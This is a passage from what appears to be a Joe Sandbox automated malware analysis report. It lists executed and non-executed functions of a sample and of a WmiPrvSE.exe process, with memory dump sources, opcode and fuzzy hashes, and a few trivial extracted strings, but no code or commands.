Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c36853a88a6fb0680a2d93605018a3c2113fa10da8d370e60dc4794a75109a3b
Instruction ID: 3a866af8501caaab26e25700f9e8073e686910c5be765560db1915df8c59b2df
Opcode Fuzzy Hash: c36853a88a6fb0680a2d93605018a3c2113fa10da8d370e60dc4794a75109a3b
Instruction Fuzzy Hash: 1301BC31A1A78C8FD702DBB4C854299BFB0EB06214F1641E7D091DB2A2E9386B48C781

Function 00007FFD9BC4BC52 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39f6fa4a5a8a73f647c0c90efb1c94df534d0eb4a65248e146c999945925b7db
Instruction ID: 2cedfe413860e2a87ad5b57fbc0a28b7575c66d33c202a3b418b17e0721c9f3d
Opcode Fuzzy Hash: 39f6fa4a5a8a73f647c0c90efb1c94df534d0eb4a65248e146c999945925b7db
Instruction Fuzzy Hash: C1F0963155E3CA9FE7129FB088615DA3FA5AF43214F0900F6E499CB0B2CA2D2716C762

Function 00007FFD9BC46452 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 568e8b40e0b841749669c5b0ffcd86b378ef973cb87e364512fe376e5d5ded71
Instruction ID: 8e0c2352a0bb6059e1624e02a672e150132cabdf96b5e4fa1781177367d8ca65
Opcode Fuzzy Hash: 568e8b40e0b841749669c5b0ffcd86b378ef973cb87e364512fe376e5d5ded71
Instruction Fuzzy Hash: 20F0963144E2CA9FD712CFB088654D93FA5AF43314B1944FAE459CB0B2C52C275AC761

Function 00007FFD9B880C50 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783181073.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c38f6860f18a54ec8fb0a02d7f6c29869e980f6a669da8a6df2b97a55e9e40a
Instruction ID: 89ae660f436f2b4c700e458102713550484faed3a99e2c55b92430055e75e741
Opcode Fuzzy Hash: 9c38f6860f18a54ec8fb0a02d7f6c29869e980f6a669da8a6df2b97a55e9e40a
Instruction Fuzzy Hash: B0018B30E1A7889FE712DBB48864699BFB0EB06214F1542E7D091CB2A2E9385B488781

Function 00007FFD9BC460C4 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20e58b26fc6c526efad68d0034f3e5cc11354f95c94ccfeb853daf760d342f9e
Instruction ID: 04331e6e3e3361b66e82af1e93d715a64cf5ad296e4cf8b11ed4e096a9b493e6
Opcode Fuzzy Hash: 20e58b26fc6c526efad68d0034f3e5cc11354f95c94ccfeb853daf760d342f9e
Instruction Fuzzy Hash: 3501F470E0955D5FDBACDF188861B6877A1FF59310F0401FDD04DD3296EA342A848B01

Function 00007FFD9B8828DA Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783181073.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab1a0aeada63eff822675f1fb3f0be98ba678f55b8b483208dd77a33d707ab83
Instruction ID: 5dcbc8bc8daeb3be1828814190b5aa8a2c7ef378e42a626f15786d94f7b926a0
Opcode Fuzzy Hash: ab1a0aeada63eff822675f1fb3f0be98ba678f55b8b483208dd77a33d707ab83
Instruction Fuzzy Hash: B4F03130A1AE1E8BEB64EF84CCA47F87361EF99711F1141B5C41DD31A5DE3C6A858B00

Function 00007FFD9B8828B4 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783181073.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26373a5ba78c4cbf62ce356db7f9142ee6a24895ed11e27c63496fce3033c082
Instruction ID: 452cfb4f07619c77ada62c3452fcfb9ae612356dc9d0ec9018a110a98bff8751
Opcode Fuzzy Hash: 26373a5ba78c4cbf62ce356db7f9142ee6a24895ed11e27c63496fce3033c082
Instruction Fuzzy Hash: 0FF0D030B19A0E8BEB64EBC4C8A46B92351AF99711F1141B5C81DD31F6DE38BA458650

Function 00007FFD9B883BEF Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783181073.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2e1de2bc9f767eada2318e34130c345db0f39a689574f98f783f6e9fb99114e
Instruction ID: 97b122e482c9bd4441b254d8dafc0829edd40d81a24f0b00433d8f47fa11a58c
Opcode Fuzzy Hash: a2e1de2bc9f767eada2318e34130c345db0f39a689574f98f783f6e9fb99114e
Instruction Fuzzy Hash: 6CE06D20F0995A4BF7A4E790C8713BE63A2DF5C300F020078D52ED32E2DE386E014740

Function 00007FFD9BC47147 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5116081f36b8de45eca02c9d3ca247e4f83ba15ddc798969174827205dbfe159
Instruction ID: f0f477ccede90ae8f1a0fcfa463b6982c0137254ee0cc28f32ae9fdd531a7c47
Opcode Fuzzy Hash: 5116081f36b8de45eca02c9d3ca247e4f83ba15ddc798969174827205dbfe159
Instruction Fuzzy Hash: DAD01241F0E79B4BEB350DB4087116C1A839F1768075701B7D54D8A2E3D9983B0843A1

Function 00007FFD9B880B9A Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783181073.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
Instruction ID: 3d54073b4cc1bfa433ba75ff8dca0bf9ee3facd169cb1edabc3c519887c30aa8
Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
Instruction Fuzzy Hash: 44D0123456680D8FC650F768D995494BA90FB0A215BCA01D0D40CC7161D3569994C701

Function 00007FFD9B885556 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783181073.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82901a1c3c42999d3a41cbd28ad49f7dbc3e64b94c13c1026bb0a05f83ef2a93
Instruction ID: 9f43d896a747d123f497da6960742b709380584c6d085bbc09ef2a9ac7930168
Opcode Fuzzy Hash: 82901a1c3c42999d3a41cbd28ad49f7dbc3e64b94c13c1026bb0a05f83ef2a93
Instruction Fuzzy Hash: CFD0A701F1DC5A46E32FB354082157E18838B88264F4400B8E02ED22CEED9C1B4102C7

Function 00007FFD9B8806AD Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783181073.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e9260afcec124849f965bfa96b0f1ca91bab1fc0a8b233f756245c75d2df6c6
Instruction ID: 013040c45f1b054a43310dc4fbd07472775e6b2257eaa21b701205e728cb0fa3
Opcode Fuzzy Hash: 4e9260afcec124849f965bfa96b0f1ca91bab1fc0a8b233f756245c75d2df6c6
Instruction Fuzzy Hash: E1C04C05F6BE5F03F87573EE98660BDA2405FCCA24FE31172D56C400B1AC6E22D54196

Function 00007FFD9BC4D41B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05f092ddd65427193150ed79bbbec3dab1ce8f5eb3647e37a21fcb98ab4d372b
Instruction ID: fa097b27ce818e9f719791f28a8650ba67be39878aeb43c2b03b81ac34db4854
Opcode Fuzzy Hash: 05f092ddd65427193150ed79bbbec3dab1ce8f5eb3647e37a21fcb98ab4d372b
Instruction Fuzzy Hash: DBD09220B0F54F86F5386FA5417027D11925F40301F622C3DD05F418E28E18BF016611

Function 00007FFD9BC47C1B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1787227542.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bc40000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e79afbc428a73aa3334e190424da80814cb350d590b1f49ba181b7671e04b4d
Instruction ID: 78e4f459088d9301f54d8f32577f1130355c41a48e6a9ddbc904a0f1043abd55
Opcode Fuzzy Hash: 8e79afbc428a73aa3334e190424da80814cb350d590b1f49ba181b7671e04b4d
Instruction Fuzzy Hash: E5D09220B0F94F89F1785EB1817033E51936F00301F22153FC09F819E18D18BB016642

Function 00007FFD9B885301 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783181073.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21938eb0ae69bd5fba05d02f9ae5636ea614e5e192c3733e90a7025620b44f03
Instruction ID: b2a69b630fc623946dafeb224113b853fd9f76cff1f266e2a8fb33236deda00d
Opcode Fuzzy Hash: 21938eb0ae69bd5fba05d02f9ae5636ea614e5e192c3733e90a7025620b44f03
Instruction Fuzzy Hash: FFC02B00E5981D42F3346B7048302BE72015F0C200F438172802E97081CD3816041200

Function 00007FFD9B8806D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1783181073.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d151555a43ec30e371fdee9760290e5673c1d9f9f8c3533e043c54596d340e7
Instruction ID: 39cdd5cd957008aaae858433a71657469c89dc4d327d745bba1a8e9c9ec5bbad
Opcode Fuzzy Hash: 8d151555a43ec30e371fdee9760290e5673c1d9f9f8c3533e043c54596d340e7
Instruction Fuzzy Hash: 66B01200E67C0F02F42433FA0C52074B0405F8C100FC30070D42C400A1A85E12940282

Non-executed Functions

Function 00007FFD9BFD0B14 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792700831.00007FFD9BFD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9bfd0000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78f4cf138774e5ff4f47c0aac04367f3e251176d78fe3ac7e1d9e4be06ac8859
Instruction ID: 67101d699fd7044fbe15edfe1bab79cabcaef351c8e5469f06231a0b0b79eaa2
Opcode Fuzzy Hash: 78f4cf138774e5ff4f47c0aac04367f3e251176d78fe3ac7e1d9e4be06ac8859
Instruction Fuzzy Hash: 5D413A31A19509CFD798EFA8C8A5ABD77B2FF88304F540579D00AE72A5DF35A941CB40

Function 00007FFD9B8809B0 Relevance: 5.2, Strings: 4, Instructions: 194COMMON

Download Yara Rule

Strings

!k9, xrefs: 00007FFD9B880B4E
#{9, xrefs: 00007FFD9B880B3E
c9, xrefs: 00007FFD9B880B56
"s9, xrefs: 00007FFD9B880B46

Memory Dump Source

Source File: 00000000.00000002.1783181073.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b880000_9D7RwuJrth.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9$#{9
API String ID: 0-1692736845
Opcode ID: b6b32ff79bc32f3be930bed198621cf731cd8149d7c088a7d98b25975c38ea4a
Instruction ID: 8b5b46b13854009d354a7f924069ad7c9c6bdade463af9c2e5e44ce7b65823bb
Opcode Fuzzy Hash: b6b32ff79bc32f3be930bed198621cf731cd8149d7c088a7d98b25975c38ea4a
Instruction Fuzzy Hash: C651F287B1843786E31E33FD79299EC5B40DF8433DB0846B7E16E8A0C79C58648792E5

Analysis Process: WmiPrvSE.exePID: 3720, Parent PID: 3120COMMON

Executed Functions

Function 00007FFD9BFF506F Relevance: .7, Instructions: 724COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a08e4296ac6f5c96ec4fb4c464a03dfe926ce17564bbc0f157be3833636467
Instruction ID: ef3a5f240f93db960fa4192c03ae7ebae47f7013a3f890a3a409d89aee312c83
Opcode Fuzzy Hash: b4a08e4296ac6f5c96ec4fb4c464a03dfe926ce17564bbc0f157be3833636467
Instruction Fuzzy Hash: 4E52B130B1A65D8FDB6CCF58C4A56B87BA1FF49300F5142BDD45EC7296CA39AA81CB40

Function 00007FFD9B8A0D70 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1887668865.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9b8a0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d72eebf7afa1e611a1d1b753a46b332b3e553425f58b8aa2e0fcea07d4c8249
Instruction ID: a383f82d23a30edd14a86dc7bc6390759f08d59093ab188c581e651db501d911
Opcode Fuzzy Hash: 5d72eebf7afa1e611a1d1b753a46b332b3e553425f58b8aa2e0fcea07d4c8249
Instruction Fuzzy Hash: 3A91D071A18A8D8FEB8CDB6888697A9BFE1FB99310F4101BAD04DD72D6DF781811C741

Function 00007FFD9BC60C95 Relevance: 2.3, Strings: 1, Instructions: 1017COMMON

Download Yara Rule

Strings

d, xrefs: 00007FFD9BC61107

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: d9a9508b9ebba8e73cdea8c0f00b36eff1c219cd1225ce57764ae546637be4cd
Instruction ID: 8ce5d773b5139328c4b47ca90023492f44d94fbd212ca3c28e710307620df374
Opcode Fuzzy Hash: d9a9508b9ebba8e73cdea8c0f00b36eff1c219cd1225ce57764ae546637be4cd
Instruction Fuzzy Hash: FE625A31B0E64B8FE7599B68D8A19B977E0FF52314B1501BAC489CB1A7DD28BC43C781

Function 00007FFD9BFF4DF8 Relevance: 1.4, Strings: 1, Instructions: 162COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BFF4E72

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: a125ba76103430606d9e4fb2151b9dea9e7f50bbe34bacd239b7e8c2cea282b7
Instruction ID: cdd4d5e8045cc21dddb99a4e87ff089e908959c9ab2321de5e9e60c199a866e6
Opcode Fuzzy Hash: a125ba76103430606d9e4fb2151b9dea9e7f50bbe34bacd239b7e8c2cea282b7
Instruction Fuzzy Hash: 28513D31F0A60E8FEB59DF99D8645ACBBB1EF44300F1141BED01AD72D6DA352A01CB50

Function 00007FFD9BC6DF48 Relevance: 1.4, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BC6DFB2

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7f6f5657fb41bcbd0a0895c11ac4bba65c4f54c9909b0178f5fb39b78b9fa3e0
Instruction ID: 23da9697838a8045d800ec76b5b8e7b51a8ee61f66860fd3090507395ef467ef
Opcode Fuzzy Hash: 7f6f5657fb41bcbd0a0895c11ac4bba65c4f54c9909b0178f5fb39b78b9fa3e0
Instruction Fuzzy Hash: 23517D71E0964FCFDB68DBA8C8649BCB7B1FF55300F1140BAD01AE72A6DA346A01CB51

Function 00007FFD9BC68748 Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

, xrefs: 00007FFD9BC687B2

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7f9ce49440aa624ac3af321cc408ad94d8d5b68aed2ca4f9e67ee19855949119
Instruction ID: 3ba38dfae35284f6e5993e604c08ec6264e0eeadaeebd1a5ad947f34a3753591
Opcode Fuzzy Hash: 7f9ce49440aa624ac3af321cc408ad94d8d5b68aed2ca4f9e67ee19855949119
Instruction Fuzzy Hash: 69518D71E0A64FCFDB58DBA8D8649BDB7B1EF58304F1140BAD01AE7292DA386901CB50

Function 00007FFD9BC6CA59 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

#, xrefs: 00007FFD9BC6CAE8

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-3629985089
Opcode ID: 8c1cd4cfbd9530ee193a9bf80512a857b05c1c244f95262414a99403bc52dfe9
Instruction ID: bb8897d7bee45246c688b4d829ef5ccc743ede1b0910244b0e95e0a00049f9f0
Opcode Fuzzy Hash: 8c1cd4cfbd9530ee193a9bf80512a857b05c1c244f95262414a99403bc52dfe9
Instruction Fuzzy Hash: 30310772F0A94F8FDB68D6B844629ADB7D1EF54312F05027AE01DC32E3ED2969024381

Function 00007FFD9BC6B942 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

#, xrefs: 00007FFD9BC6B9EA

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-3629985089
Opcode ID: bef1a66cf79bbf55e0d4b0e4eab39550188cfc26524874ef425918e4dcaccd5c
Instruction ID: a837b6c0a84cb089ded121d929dbc142aa461aefd429a0006fe79015e849fb0e
Opcode Fuzzy Hash: bef1a66cf79bbf55e0d4b0e4eab39550188cfc26524874ef425918e4dcaccd5c
Instruction Fuzzy Hash: 0A21FB35A1991DCFDF9CDB68C866AEDB7B1FF68300F1401AA900EE3291CA35A9418B40

Function 00007FFD9BFFD5F2 Relevance: .8, Instructions: 789COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24a5eadc77f61cac69cb20201a38caacf85c0ccb131c6950bf5d24ee68e3519f
Instruction ID: a1bf2f00b519926426a89ebfef331df714323754235f2d851c383579cc926a61
Opcode Fuzzy Hash: 24a5eadc77f61cac69cb20201a38caacf85c0ccb131c6950bf5d24ee68e3519f
Instruction Fuzzy Hash: 0F22717370F69A4BE729BBAC78654E4BB91EF4536470842FBD09C870E7ED15A84283C1

Function 00007FFD9BFFA6D7 Relevance: .7, Instructions: 722COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4134438567c8d40aed7675c188c3d17ddc8e005121708999f9f12f63e312731a
Instruction ID: c83aaf7b9d5c864ef7fc62a6fc52bb698de2f64b1b1e5699a6e29ea5a3aa30c7
Opcode Fuzzy Hash: 4134438567c8d40aed7675c188c3d17ddc8e005121708999f9f12f63e312731a
Instruction Fuzzy Hash: 0C527974A0591D8FDF99EF18C8A8BA977B1FB68305F1141E9D00EE7265DA31AE81CF40

Function 00007FFD9BFF2D80 Relevance: .7, Instructions: 692COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ef73f4394e719867281850ff7273a0b611a0e6dad8314b1723c97fc2c165bf
Instruction ID: 4d6ecf5f2732c5e2e07971a09acd73186132389902a9111bc499a1e3c4e86b4f
Opcode Fuzzy Hash: f4ef73f4394e719867281850ff7273a0b611a0e6dad8314b1723c97fc2c165bf
Instruction Fuzzy Hash: FC32B630B19A1D8FDBA8DF48C865AA877E2FF54310B5102B9D00EC72A2DE35ED45CB80

Function 00007FFD9BFF1EBE Relevance: .5, Instructions: 521COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4ceee9a4c5129d15cca76e043ea17f9943419f196e65d3101f9629feb6652c8
Instruction ID: 3a98f07a36f07f108b362e84a6d1152e973e83d71d2114ef23bdbe3768ad6750
Opcode Fuzzy Hash: a4ceee9a4c5129d15cca76e043ea17f9943419f196e65d3101f9629feb6652c8
Instruction Fuzzy Hash: 2BF1013070C8198FDB8CFB1CD4A9E6573E2EBA9705B504069E50FC72AADD25EC91CB91

Function 00007FFD9BC689AF Relevance: .5, Instructions: 451COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de9087d42fe337296b1477510a5dc462457af87def06a392b7797c7cff70d7e4
Instruction ID: 4ccdf9287f2d24c5661ce26e153ef0bc463360ccda206abb41d3b01a77b80303
Opcode Fuzzy Hash: de9087d42fe337296b1477510a5dc462457af87def06a392b7797c7cff70d7e4
Instruction Fuzzy Hash: 34F1D53061964ACFDB58CF58C4E0AB837A1FF55314F5541BEC84ACB29ADB38E981CB51

Function 00007FFD9BFFA596 Relevance: .4, Instructions: 442COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b59123f1796430e35fd9a25ed96f2865dcfaf03096e4122558ce45ccfd0c7ea5
Instruction ID: dc8be953daf81417b2b10106c7aac506cc34c6467426f212d59f4b74a7d03248
Opcode Fuzzy Hash: b59123f1796430e35fd9a25ed96f2865dcfaf03096e4122558ce45ccfd0c7ea5
Instruction Fuzzy Hash: 5402BE74A0991C8FDFA9EF18C8A4BA977B1FB68305F1141D9D00EE7265DA31AE81CF40

Function 00007FFD9BFFC99D Relevance: .4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848846cd61f0a7a140257b53f10674922c55f1d91a4eae4cfcd9159ffeb713ff
Instruction ID: f638a30cba5d5885788c6dda56c47e6ffa7c388cf027cf6bfe50050d4edb2680
Opcode Fuzzy Hash: 848846cd61f0a7a140257b53f10674922c55f1d91a4eae4cfcd9159ffeb713ff
Instruction Fuzzy Hash: D6E1CB71A0995D8FDFA9EF58C8A4BA8B7B1FB68301F1501E9D00DD7291DA35AE81CF40

Function 00007FFD9BFFB7D2 Relevance: .4, Instructions: 376COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1897982599.00007FFD9BFF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BFF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bff0000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62eae1c097feac72bf8686d5b960a9e9eb2b1c80b2ebe7cc62e90efbf41642c1
Instruction ID: 85454e29b134b206134b20d53090845415485e501f303aab974cc725d2dffb1d
Opcode Fuzzy Hash: 62eae1c097feac72bf8686d5b960a9e9eb2b1c80b2ebe7cc62e90efbf41642c1
Instruction Fuzzy Hash: 34E17971A0991D8FDFA8EF18C898BA977B1FB69301F1041E9D00DD72A1DA35AD81CF40

Function 00007FFD9BC6E1AF Relevance: .4, Instructions: 365COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1891765236.00007FFD9BC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffd9bc60000_WmiPrvSE.jbxd

Similarity

API ID:
String ID:
